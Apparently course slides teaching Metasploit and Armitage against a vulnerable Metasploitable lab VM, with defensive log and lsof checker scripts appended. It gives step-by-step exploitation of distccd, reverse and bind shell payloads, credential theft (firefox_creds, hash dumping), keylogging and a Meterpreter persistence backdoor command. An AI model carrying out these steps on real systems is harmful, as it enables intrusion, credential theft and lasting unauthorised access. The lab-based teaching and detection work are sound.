Metasploit a short tutorial
Thanks to Jos Wetzels & Wouter Bokslag
STATUS OF THESE SLIDES
Status: third version, improved and extended tutorial which includes use of VMware. Additional slides are not included in the program for the moment; they still need to be polished. BackTrack Linux has been replaced by Kali Linux (the slides have not been updated yet).
Let's start - TBCHANGED
Students are supposed to install Metasploit on their computer. The slides we make here are done using Kali Linux and Armitage on the attacking side and Metasploitable on the attacked side. Metasploitable is a Linux distribution full of bugged services that can be used to practice Metasploit attacking skills. See:
BTW: the last link is a beautiful site/tutorial on the use of Linux.
We start with an exercise and then we get into the explanation. This exercise is *obligatory*.
Setup
Warning: much more than running WebGoat, running Metasploitable makes you vulnerable also to external attacks. Be ready to be hacked. So, if you run it on your usual computer using VMware, use the network configuration "host only". This will make sure you cannot be hacked from outside.
Setup I use for this small tutorial (and for most of what I do): Mac + 2 virtual machines (one with Kali 2.0, the other one with Metasploitable).
You can download
(OLD) Instructions for Windows
Instructions for Windows are probably the following (they are old, and if they are not correct, find the solution yourself, ok? Real hackers are not stopped by silly details):
Download Metasploit; it should come with ARMITAGE and Nmap built in.
Download VMware Player (it's free).
Download Metasploitable.
Open Metasploitable in VMware Player and run it.
Log in with msfadmin:msfadmin.
Get root using sudo su with password msfadmin.
Check if the network connection is up and running using ifconfig/ping, else use dhclient. Note down the Metasploitable IP.
Start ARMITAGE (Start -> All Programs -> Metasploit Framework -> ARMITAGE) or: armitage &
Instructions for Linux/VMware
Install Kali and Metasploitable in two different virtual machines.
Make sure they are connected with the "host only" system.
Change the root password.
Use the following command (regularly) to make sure you have the latest version installed:
# apt-get update && apt-get upgrade
Meaning: type apt-get update && apt-get upgrade (the # is the root prompt, not part of the command).
Warning
Some of these slides are written from the Windows perspective. Some others are written using BackTrack. Corrections to the slides are more than welcome. Again, you are expected to sort mismatches yourself.
Starting up BT with Kali
# startx (check if needed: do this only if the X Window System doesn't start on its own)
Open a terminal window.
# service postgresql start (check if needed; may require: # /etc/init.d/postgresql start)
# service metasploit start (on Kali 1)
# msfdb (on Kali 2)
# armitage
That will try to connect to the Metasploit RPC server: click "connect". If Metasploit is not running it will kindly ask you if it should start it for you. Click "yes" and be patient.
Oops
Depending on the network configuration you could get an error message. In this case....
# ifconfig
eth Link encap:Ethernet HWaddr 00:0c:29:b8:b6:58 inet addr: Bcast: Mask:
Using ARMITAGE (the interface to Metasploit)
The juicy interface: Armitage = Metasploit ++
Metasploit console
Hosts I've already "added" (we see in a minute how to do this)
The console
To find out the "local" hosts
With ifconfig you know the IP address of your (virtual) machine. You need to scan the network for the other ones. To add the hosts (one of the many ways) you can use Nmap directly from Armitage: Hosts > Nmap Scan > Quick Scan (OS Detect). You don't want Nmap to scan the whole network, so it is better if you have an idea which addresses you are looking for.
About Scanning
You can initiate an Nmap scan through Hosts -> NMap Scan -> Intense Scan, All TCP Ports. But watch out: this is a very heavyweight scan. System administrators are going to see it happening. And they'll ask you questions.
Initiate an auxiliary scan through Hosts -> MSF Scans.
Wait until both scans complete (MSF Scan will notify you with a message box; the Nmap scan tab will say so).
See what ports are open and what services they are running by right-clicking the target -> Services.
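How a system administrator "sees it happening": an added example (not part of these slides) that reads iptables LOG lines from the target's firewall and flags any source that hits many distinct ports in a short window, which is what the Nmap scans above look like from the Metasploitable side. The log lines, host names and addresses are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Fields we need from an iptables LOG line (other fields are skipped).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>[\d.]+) "
    r".*?DST=(?P<dst>[\d.]+) .*?PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)"
)

def constructed_log():
    """Build sample firewall log lines (constructed for this example)."""
    lines = []
    # Twelve SYNs to twelve different ports within twelve seconds: what an
    # Nmap scan of Metasploitable looks like from the target's own firewall.
    scan_ports = [21, 22, 23, 25, 53, 80, 111, 139, 445, 512, 513, 514]
    for i, port in enumerate(scan_ports):
        lines.append(
            f"Mar  3 10:15:{i:02d} metasploitable kernel: IN=eth0 OUT= "
            f"SRC=192.168.56.101 DST=192.168.56.102 LEN=44 PROTO=TCP "
            f"SPT={41000 + i} DPT={port} WINDOW=1024 SYN URGP=0"
        )
    # One ordinary SSH connection from the admin host that must not be flagged.
    lines.append(
        "Mar  3 10:20:00 metasploitable kernel: IN=eth0 OUT= "
        "SRC=192.168.56.1 DST=192.168.56.102 LEN=60 PROTO=TCP "
        "SPT=50000 DPT=22 WINDOW=65535 SYN URGP=0"
    )
    return "\n".join(lines)

def parse_events(log_text):
    """Return {src: [(timestamp, dst, dport), ...]} for lines that match."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        # Syslog timestamps carry no year; only differences matter here.
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events[m["src"]].append((ts, m["dst"], int(m["dpt"])))
    return events

def detect_scans(log_text, window_s=60, min_ports=10):
    """Map each source that touched >= min_ports distinct (dst, port) pairs
    inside any window_s-second window to the largest such count."""
    alerts = {}
    for src, evs in parse_events(log_text).items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # Slide the window start forward until it covers <= window_s.
            while (evs[hi][0] - evs[lo][0]).total_seconds() > window_s:
                lo += 1
            targets = {(dst, port) for _, dst, port in evs[lo:hi + 1]}
            if len(targets) >= min_ports:
                alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts
```

Running detect_scans(constructed_log()) reports the scanning host with 12 distinct ports and stays silent about the single SSH connection.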
If the scanning went well....
You get an inviting-looking message, and now the target computer(s) is on your radar.
Now you need to get in....
You can use "login" if you have a legitimate login to the target system (assume we don't). Your goal is to find vulnerable services. You can go for a deeper scan: right-click "scan". And then....
Gathering information
You have discovered the operating system (see the penguin). Now right-click "services".
Finally > Attacks > Find Attacks....
Finding the right attack
Right click > Attack > ftp: you get to see 5 (in this case) exploits on (known vulnerabilities of) the ftp service that are known by Metasploit and that you *might* be able to use to attack the target. There is no guarantee that the target is actually vulnerable to any of them. So which one should you use? The hard way is to look at the features of the attacks one by one (more on how to do this later) and see if they match the target. The easy way is to use the "check" function. NB: not all exploits can be "checked". Let's try it...
Some tries....
So far, little luck
If we check the ftp exploit, we get only two types of results:
[*] This exploit does not support check
The target might be exploitable, but you don't know, OR
[*] The target is not exploitable
Meaning the target does not contain the vulnerability needed by the exploit. Perhaps it has been patched, or it uses software that does not match the exploit.
So? We try other attacks. For instance: Attack > misc > distcc_exec, exploiting service distccd.
Bingo! So this is something we can and will use.
To do so, we'd better first learn how to use the MSF console, which is the leftmost tab in the lower part of the screen.
Exploitation, the graphical way...
Find suitable attack suggestions (as opposed to manually identifying them): Attacks -> Find Attacks. When a message box notifies you that attacks have been found, an 'Attack' menu is added to the host right-click menu.
Find vulnerable services by right-clicking the target -> Attack -> 'Service name' -> Check Exploits. This will open a tab which runs the 'check' method for each possible exploit. Press CTRL+F and search for "vulnerable".
Some exploit modules do not support the `check` method; try these manually or check their descriptions. You can also search manually in the left-hand menu under 'exploits'.
But old pros like you use the MSF Console
It is the only supported way to access most of the features within Metasploit.
Provides a console-based interface to the framework.
Contains the most features and is the most stable MSF interface.
Full readline support, tabbing, and command completion.
Execution of external commands in msfconsole is possible.
Some of the commands
While using MSFConsole other commands become available:
check -> check if the target is vulnerable to the selected exploit (not always supported)
exploit -> run the exploit with the set configuration
run -> run an auxiliary module with the set configuration
Command-line Search: type `search distcc`
We know that our target is attackable via the distcc_exec exploit. We now want to build the attack from the console. First we need to find the exploit (this *does* work in Kali). Type `search distcc`. You might have to be patient waiting for the answer.
Note
Here you see as result exploit/unix/misc/distcc_exec, but on your release the directory may vary. Now you want to know more about this exploit. So you invoke: info exploit/unix/misc/distcc_exec
+ references (not included in this screenshot)
Options TBD: check the automatic targeting
As you can see there are two basic options:
RHOST -> contains the target address
RPORT -> contains the target port
The info also notifies you that the maximum payload space is 1024 bytes and that targeting is done automatically (instead of having to select one depending on target host details). We'll get back to this payload thing in a second.
Type `use exploit/unix/misc/distcc_exec` to use the exploit. You enter "exploitation mode". Type `help` to view the exploit commands.
Exploit Commands
So: what can we do with this exploit? In itself, it simply sets the first step in a (e.g.) buffer overflow. And what can we do as second step? Meet the payload....
The carrier and the payload
distcc_exec is basically a "carrier" that can probably carry many different kinds of payloads. Our goal is to get full control of the target machine, so let's see if we can do this using this carrier.
Let's choose a Payload
We know we have 1024 bytes of payload space (which is enough for a lot of purposes). Let's see what you can do with it. Type:
show targets (here not needed because it is an "automatic target" exploit)
show payloads (next slide)
Show Payloads
A shell is what you want to get.
Bind TCP: a shell on the target machine, which listens on a given port.
Reverse TCP: a shell on the target machine, which connects back to the attacking one (bye bye firewall... no problem with NAT translations etc.).
Two years ago there were half as many payloads....
Type `info cmd/unix/bind_perl` to display information about this payload.
Info on bind_perl
Set payload; show options
Options of the exploit
Options of the specific payload
Going on....
Type `set RHOST 192.168.232.128` to select our target.
Since our RPORT is already set correctly and RHOST isn't necessary for the payload, we won't set those. Our bindshell will listen on port (????, in other images) if it is executed successfully; keep in mind this port has to be free and preferably above 1024 (since most services don't run as root, and only root can listen on ports below 1024).
For some exploits, we can type `check` to see if the target is vulnerable; we won't do it for this one though.
Type `show evasion` to show evasion methods (we will not select any).
Now type `exploit` to exploit our target.
Alternative way to set LPORT, etc...
Set LHOST to the IP of the attacking machine (if you're not using a pivot, this is your own IP).
Let LPORT be whatever it is.
Set RHOST to be the IP of the target machine.
Set RPORT to be the port of the vulnerable service (in this case 3632 of distccd).
Click Launch.
BINGO!!!
Notice how Armitage tells you that the target has been compromised. Now we can do basically anything on it.
Graphical Notation
Did you succeed?
If you are successful, the target machine icon will be red with electric jolts and the console tab will notify you that you have a shell. A menu option for the shell will be added to the right-click menu of the target.
NOTE: For Unix targets a shell is the default payload; for Windows targets a Meterpreter session is the default payload. These can be modified by working from the console tab and using MSFConsole instead of the GUI. Results are added to the GUI though.
Interact with Shell 1: you now have compromised the target machine.
Meterpreter? (1)
Typically, you want to have a shell on the target system, so the payload executes a command interpreter like /bin/sh. This approach, however, has disadvantages (think about it a sec):
Easily detectable: the execution of a program involves the creation of a process, which can be detected by a host-based intrusion detection system (whitelisting).
Chroot problem: if the application you exploit is chrooted, then it is impossible for it (and thus for your payload) to refer to objects outside the chrooted environment. So you can't call /bin/sh altogether (there appear to be ways out of this, but if you are at that level you should not sit in this class).
Limitation of the command interpreter, which may have access to a limited set of commands.
Meterpreter! (2)
The Meterpreter is a meta-interpreter that runs within the exploited application. It evades the problems we mentioned so far:
NOT easily detectable: the Meterpreter does not need to start a new process. Also, the Meterpreter extensions, and the Meterpreter server itself, are all executed entirely from memory (a technique called Remote Library Injection). In some cases the injected application keeps on running.
DOES NOT HAVE a chroot problem: it executes all commands within the exploited application, so it doesn't have to access other resources (which would be difficult in the case of a chrooted application).
DOES NOT SUFFER limitations of the command interpreter; actually you can write your own command extensions as long as they can be compiled into a DLL.
For instance, we can start a shell
Notice the extra menu item "Shell 1" that has appeared when you right-click. Click "interact", and what you get is
A shell on the target machine
It appears as a new tab in the bottom window.
You upload some files
Use: Try it on a custom file
Then go to your console, type "ls" and notice that the file has been uploaded. It could be an executable, of course.
You can pass the session to yourself or someone else.
Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access -> Pass Session will inject Meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage's default Meterpreter listener. Just click Launch.
You may also use Pass Session to send Meterpreter to a friend. Set LPORT and LHOST to the values of their Meterpreter multi/handler. If your friend uses Armitage, have them type `set` in a Console tab and report the LHOST and LPORT values to you. These are the values for their default Meterpreter listener.
So if you launch Pass Session, you'll get a second shell.
Post-exploitation modules
Now you are in, you have control of the target, but you want to carry out specific tasks, like keylogging. You can use one of the many ready post-exploitation modules.
Exercise: try some of these post-exploitation modules.
For instance: post-module firefox_creds...
Payload Usage in Armitage
ARMITAGE has static payloads (Shell for Unix targets, Meterpreter for Windows targets) but supports MSFConsole in a tab. Great use of payloads in ARMITAGE: generating payload executables. Let's generate a payload ELF.
Take a look at "adduser" (1/3)
Either use the left-hand menu, or
Take a look at "adduser" (2/3)
but old pros like you use the MSFConsole.
> use payload/linux/x86/adduser (note: requires root shell!)
> set USER metasploit
> set PASS metasploit
> generate -t elf -f C:\\dir\\naughtyelf (don't use double-quotes)
Take a look at "adduser" (3/3)
And now you can upload it....
Right-click target -> Shell1 -> Upload -> Select naughtyelf
Right-click target -> Shell1 -> Interact
$ chmod +x ./naughtyelf
$ ./naughtyelf
$ cat /etc/passwd (and verify a new user named metasploit is added)
Let's Recapitulate
Metasploit: a framework for penetration testing and exploitation
Metasploit is an open source
Metasploit Architecture
TOOLS
PLUGINS
LIBRARY
MODULES: Exploits, Payloads, Encoders, Nops, Auxiliary
Exploits
For a single vulnerability, for a set of targets.
Active exploits: attack a specific host.
Passive exploits: wait for a connection and try to exploit the connecting application (e.g. the web browser).
Payloads
Generate stand-alone shellcode, or can be selected for use in exploits. Three types:
Inline/Single: standalone, self-contained shellcode (e.g. adding a user to a system).
Stager: sets up a network connection between victim and attacker (e.g. bind shells, reverse connect shell, etc.).
Stages: payload components downloaded by the Stager module; provide advanced features with no size limit (e.g. Meterpreter, VNC injection, etc.).
Encoders
Encoders encode a payload and prefix a decoder to evade detection.
Must not touch certain registers.
Must be under a max size.
Must avoid bad characters (NULL bytes, newlines, etc.).
We'll get back to this when we describe how to write your own module.
Can generate alphanumeric shellcode (ASCII-printable shellcode).
And now: Armitage
ADDITIONAL SLIDES TO BE INCLUDED (ONE DAY)
Meterpreter in Armitage
Assume we have exploited a Windows machine and have a running Meterpreter session. This can be achieved without exploitation through the left-hand menu -> Payloads -> Windows -> Meterpreter -> bind_tcp and generating an EXE file containing the Meterpreter payload. After running it on the target machine, go to ARMITAGE -> Listeners -> Bind and connect to the port of the Meterpreter session to compromise the target machine.
Can be used to browse files, list processes, run a VNC session, make screenshots, etc.
System Access & Escalation
Meterpreter -> Access -> Escalate Privileges to get the highest possible privileges (potentially SYSTEM).
Meterpreter -> Access -> Dump Hashes to dump system hashes; View -> Credentials to view them. These can be used in a "pass the hash" attack or cracked using Cain or John the Ripper.
Meterpreter -> Access -> Migrate Now migrates the Meterpreter session to a new process.
Meterpreter -> Explore -> Key Scan initiates a keylogger on the target machine, logging all pressed keys.
ARP Scan
Meterpreter -> ARP Scan
ARP scanning finds hosts on the same network as the compromised host. Pick the subnet you're interested in and click ARP Scan; this adds hosts in the same subnet to your ARMITAGE target list.
Pivoting
Pivoting is routing your Metasploit attacks through a compromised host. In order to set up pivoting, right-click the target -> Meterpreter -> Pivot -> Setup. Select the subnet you want to pivot through the session. Once set up, green lines will be drawn between the host and all reachable targets. The line will become bright green when the pivot is in use. To use a pivot host for a reverse connection, set the LHOST variable in the exploit launch dialog to the IP address of the pivot host.
Maintaining access using persistence
Meterpreter console -> run persistence -U -i 5 -p 1337 -r
Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a Meterpreter connection will be spawned.
Other way to maintain access
Creating a persistent Meterpreter backdoor service (METSVC) allows us to maintain access: right-click target -> Meterpreter -> Access -> Persist. Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a Meterpreter connection will be spawned.
Handy Commands
ifconfig: to see which interfaces are open.
lsof (list of open files; typical: lsof -i -P) to see which programs are listening on which ports (in Unix, sockets are files).
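The same lsof -i -P output, read from the defender's side: a bind-shell payload such as the bind_perl one used earlier shows up as an interpreter (perl) owning a LISTEN socket on a high port, exactly the kind of entry this listing is meant to reveal. The script below is an added example (not from the slides): it parses lsof -i -P -n output and reports every listener that is not on an allowlist of expected (command, port) pairs. The lsof output, PIDs and the port 4444 are constructed sample values.

```python
from dataclasses import dataclass

# Output of `lsof -i -P -n` as it might look on Metasploitable (constructed).
# The perl process on 4444 stands in for a bind-shell payload such as
# cmd/unix/bind_perl; 4444 is a sample port, not a value from the slides.
SAMPLE_LSOF = """\
COMMAND    PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd       845     root    3u  IPv4  10234      0t0  TCP *:22 (LISTEN)
distccd   1020   daemon    4u  IPv4  11001      0t0  TCP *:3632 (LISTEN)
named      912     bind   20u  IPv4  10890      0t0  UDP *:53
perl      2213   daemon    3u  IPv4  15099      0t0  TCP *:4444 (LISTEN)
sshd      2301     root    3u  IPv4  15800      0t0  TCP 192.168.56.102:22->192.168.56.1:50000 (ESTABLISHED)
"""

# Interpreters that normally have no business owning a listening socket.
INTERPRETERS = {"perl", "python", "python3", "ruby", "sh", "bash", "nc"}

@dataclass
class Socket:
    command: str
    pid: int
    user: str
    proto: str
    name: str
    state: str

def parse_lsof(text):
    """Parse `lsof -i -P -n` output into Socket records (header skipped)."""
    socks = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 9 or parts[0] == "COMMAND":
            continue
        # The trailing "(LISTEN)" / "(ESTABLISHED)" column is absent for UDP.
        state = parts[9].strip("()") if len(parts) > 9 else ""
        socks.append(Socket(parts[0], int(parts[1]), parts[2], parts[7], parts[8], state))
    return socks

def local_port(name):
    """Local port of an lsof NAME field such as '*:22' or '10.0.0.2:22->...'."""
    local = name.split("->", 1)[0]
    return int(local.rsplit(":", 1)[1])

def unexpected_listeners(text, allowlist):
    """Report LISTEN sockets whose (command, port) is not in allowlist.

    The allowlist says what is expected on this box, not what is safe:
    distccd on 3632 is expected on Metasploitable and still exploitable."""
    findings = []
    for s in parse_lsof(text):
        if s.state != "LISTEN":
            continue
        port = local_port(s.name)
        if (s.command, port) in allowlist:
            continue
        why = "interpreter bound to a socket" if s.command in INTERPRETERS else "not in allowlist"
        findings.append((s.command, s.pid, s.user, port, why))
    return findings
```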